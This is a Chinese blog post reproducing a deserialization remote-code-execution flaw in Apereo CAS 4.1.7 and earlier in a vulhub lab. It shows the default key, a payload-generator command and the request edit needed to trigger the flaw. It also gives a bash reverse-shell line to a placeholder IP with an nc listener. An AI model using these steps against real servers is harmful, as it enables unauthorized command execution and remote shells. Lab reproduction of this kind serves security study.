Apereo-cas4.1 反序列化 Rce漏洞复现

已于 2022-01-19 15:44:37 修改
阅读量4.9k 收藏 3
点赞数 1
分类专栏: 漏洞 文章标签: 安全
于 2022-01-19 15:32:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58596609/article/details/122581364
版权

0x00 前言

--学如逆水行舟,不进则退

0x01 漏洞简介

Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令

0x02 影响版本

 Apereo CAS <= 4.1.7

0x03 漏洞原理

Webflow中使用了默认密钥changeit,如下

public class EncryptedTranscoder implements Transcoder {
    private CipherBean cipherBean;
    private boolean compression = true;

    public EncryptedTranscoder() throws IOException {
        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
        bufferedBlockCipherBean.setKeyAlias("aes128");
        bufferedBlockCipherBean.setKeyPassword("changeit");
        bufferedBlockCipherBean.setNonce(new RBGNonce());
        this.setCipherBean(bufferedBlockCipherBean);
    }

0x04 环境搭建

这里我们使用vulhub靶场搭建

cd /vulhub-master/apero-cas/4.1-rce     //进去漏洞目录下

docker-compose up -d        //启动漏洞环境

启动之后,访问ip:8080/cas/login ,出现一下页面,说明搭建成功

0x05 漏洞复现 

这里我们需要使用到一个工具,用来生成paylaod

下载地址为:

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

 下载好之后,我们来使用以下命令生成payload(也就是我们要执行的命令)

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "mkdir qwe"

 生成好payload之后,在ip:8080/cas/login页面抓包,如下图 

抓包之后,发送到repeater模块中,进行修改数据包 

注意:::我们要把包中execution参数改为我们刚才生成的payload,如下图

发包之后,在docker容器中查看命令是否执行成功

docker ps    ///查看docker容器id

docker exec -it 容器id bash 

 

 发现我们之前创建文件夹的命令执行成功了

开始反弹shell

反弹shell之前需要先将反弹shell命令进行base64编码,编码网址为:

java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)https://www.jackson-t.ca/runtime-exec-payloads.html

 /bin/bash -i > /dev/tcp/xxx.xxx.xxx.xxx/1122 0<&1 2>&1

 编码好之后,使用上面成功payload的工具再次生成payload

 同样进行抓包,把execution参数改为反弹shell的payload,同时nc监听,如下图

反弹shell成功

 0x06 漏洞修复

升级至最新版本

种树人1
关注
专栏目录
[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞
qq_51577576的博客
10-24 1335
[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞 Apereo CAS 是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞(硬编码导致的漏洞),进而执行任意命令。
Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告
weixin_48400575的博客
01-25 3249
演示视频 Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/ 参考文章 https://vulhub.org/#/environments/apereo-cas/4.1-rce/ Apereo-cas 4.1 反序列化 RCE 漏洞_菜鸟的学习笔记-CSDN博客Apereo-cas 4.1 反序列化 RCE 漏洞一. 环境搭建使用vul
Apereo CAS 4.1/4.x 反序列化RCE漏洞 漏洞复现
ADummy的博客
02-20 2121
Apereo CAS 4.1反序列化RCE漏洞 by ADummy 0x00利用路线 ​ 构造(可以使用ysoserial)可执行命令的序列化对象—>发送给目标61616端口—>访问web管理页面,读取消息,触发漏洞—>代码执行 0x01漏洞介绍 ​ Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行反序列化的过程中存在一个问题,该案例引起了RCE漏洞Apereo Cas一般是用来做身份认证的,所以有一定的攻击
远程代码执行漏洞RCE)分析与复现
最新发布
ABUG
09-14 630
这种漏洞通常出现在没有对输入数据进行严格过滤和验证的情况下,允许恶意用户发送特制的输入,使服务器执行未授权的命令或程序。远程代码执行漏洞的严重性不言而喻,攻击者可以通过未受控的输入执行恶意命令,直接控制服务器或获取敏感信息。我们将使用常见的Web应用程序漏洞示例,来展示一个典型的RCE漏洞的发现与利用过程。RCE的危害性非常高,攻击者可以直接接管服务器,执行恶意代码,访问敏感数据,或进行更多的破坏性操作。提交恶意输入后,如果漏洞存在,页面会返回两条命令的结果:ping 命令的结果和 ls 命令的结果。
复现vulhub中apereo-cas的4.1-rce漏洞
YX_zjp的博客
04-30 867
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统,其4.1.7版本之前存在一处默认密钥changeit的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。命令:java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "mkdir 123"3、通过访问your-ip:port可以看到。6、点击登录,再通过burp suite抓包。
RCE漏洞复现
qq_43757105的博客
09-14 1014
目录 漏洞描述 漏洞等级 影响版本 准备阶段 RCE漏洞复现具体步骤: Win2008搭建好环境且ip 地址为192.168.132.132​​ Win7可以访问到在win2008 phpstudy 上提前搭建的网站​​ Win7打开bp,设置好代理访问win2008​​ send to repeater​​​​ 在请求行加一行Accept-Charset: 并且还要把“deflated”面的空格删除(不删除无法执行命令) 准备执行命令system('whoami');
Redis-RCE漏洞复现
Seizerz的博客
11-19 1834
一、简介 Redis:REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis RCE漏洞来源:https://lorexxar.cn/201...
Apereo CAS 4.1 反序列化命令执行漏洞复现
玄道的网安博客
12-14 2310
漏洞概述 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 影响版本 Apereo CAS <= 4.1.7 环境搭建 这里我使用vulhub来安装环境 进入目录并安装 启动一个Apereo CAS 4.1.5: cd vulhub-master/apereo-cas/4.1-rce/ ...
cas4.x-execution-rce:exp for 4.1.x-4.1.6,4.1.7-4.2.x,填充oracle攻击
04-14
描述中提到的"py版本cas4.x执行反序列化exp"指的是使用Python语言编写的针对这个漏洞的exploit(攻击利用程序)。这个exploit能够利用CAS服务器在处理特定请求时的反序列化过程,触发远程代码执行。"支持带内回显...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1371
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Apereo CAS 4.1 反序列化 RCE 漏洞漏洞复现
weixin_56537388的博客
11-09 383
Apereo CAS 是一个企业单点登录系统。CAS 尝试通过 Apache Commons Collections 库反序列化对象时存在问题,这导致了 RCE 漏洞
Tomcat RCE 漏洞复现(CVE-2019-0232)
热门推荐
大哥一声吼
04-18 1万+
漏洞影响范围,直接看官方公告: 总结起来漏洞影响范围如下: tomcat 7.0.04之前 tomcat 8.5.40之前 tomcat 9.0.19之前 版本都会影响 (tomcat 服务器版本在受影响范围内的小伙伴可以打一波补丁了) 测试环境 tomcat 版本8.5.31 jdk版本8.121 漏洞利用前提 修改conf里面的内容 第一处:con...
CVE-2018-1270-Spring Messaging RCE漏洞复现
m0_58596609的博客
04-22 5903
CVE-2018-1270-Spring Messaging RCE漏洞复现
微信RCE漏洞复现
m0_46171781的博客
05-02 3352
微信RCE漏洞复现 一、涉及版本: 微信 Windows 版:< 3.1.2.141 根据腾讯安全中心的公告,这是因为chrome浏览器使用的V8引擎存在安全问题导致的。该漏洞仅影响windows版本的PC版微信,且只影响3.2.1.141以下版本 二、复现过程: 1.开启cobalt strike监听 2.使用cobalt strike生成shellcode 3.将生成的shellcode进行处理,将\替换为,0 4.写入js代码中 5.在html文件中调用此js代码 6.在靶机中使用微信
ThinkPHP2-RCE漏洞复现
weixin_73180072的博客
09-10 756
这个函数会接收用户的输入,并将其存储在一个缓存文件中,以供后续使用。然而,由于没有对用户输入进行适当的过滤和验证,攻击者可以构造一个包含恶意代码的输入数据,并将其提交给该函数。当其他用户访问该应用程序时,这些恶意代码就会被执行,攻击者就可以控制整个服务器。造成该漏洞的原因在于ThinkPHP 2.x版本中,某些函数没有对用户输入进行严格的过滤和验证,导致攻击者可以通过构造恶意输入来绕过安全防护,执行恶意代码。攻击者通过利用该漏洞,可以在服务器上执行任意PHP代码,从而控制服务器。成功连接,获取shell。
JumpServer RCE漏洞复现
weixin_45945976的博客
09-06 317
JumpServer RCE 一. 漏洞url http://xxx.xxx.xx.xx 二. 漏洞详情 由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器,执行任意命令。,可以读取jumpserver日志信息,证明漏洞存在。 三. 漏洞复现 1。运行脚本获取 asset_id,system——user,user_id三个值 import asyncio import re import websockets import
金蝶云星空RCE漏洞复现
0xSec
06-21 1万+
由于金蝶云星空数据通信默认采用的是二进制数据格式,需要进行序列化与反序列化,在此过程中未对数据进行签名或校验,导致客户端发出的数据可被攻击者恶意篡改,写入包含恶意代码的序列化数据,达到在服务端远程命令执行的效果。该漏洞不仅存在于金蝶云星空管理中心(默认8000端口),普通应用(默认80端口)也存在类似问题。
CVE-2023-46604- RCE漏洞复现
2301_80115097的博客
11-16 3896
执行上述清理操作后过2分钟再次弹出安全告警,发现服务器再次生成configs.conf文件以及ksoftirqd/0进程,怀疑守护进程未全部清理干净,再次进行检查,发现存在多个守护进程ksoftirqd/0。虽然AMQ的61616端口依然开着,但几天未收到告警,本以为攻击者已经遗忘了我们公司,结果下午收到阿里云封禁服务器的通知,原因是服务器对外进行了DDOS攻击。由于云安全中心没有提示【拦截成功】,且该云账号的云安全中心为免费版,我们认为攻击者大概率入侵成功,必须立刻启动应急响应。
Apache Flink RCE 漏洞复现
weixin_44508748的博客
11-24 751
介绍 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 测试环境:Flink 1.9.1 java8+。Apache Flink 1.9.1安装包下载 https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1
致远m3-server反序列化rce漏洞复现
12-22
致远m3-server存在反序列化RCE漏洞,攻击者可以利用此漏洞在远程服务器上...总的来说,复现致远m3-server反序列化RCE漏洞需要仔细分析漏洞利用的过程,同时要遵守相关法律法规,不得在未经授权的情况下攻击他人系统。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值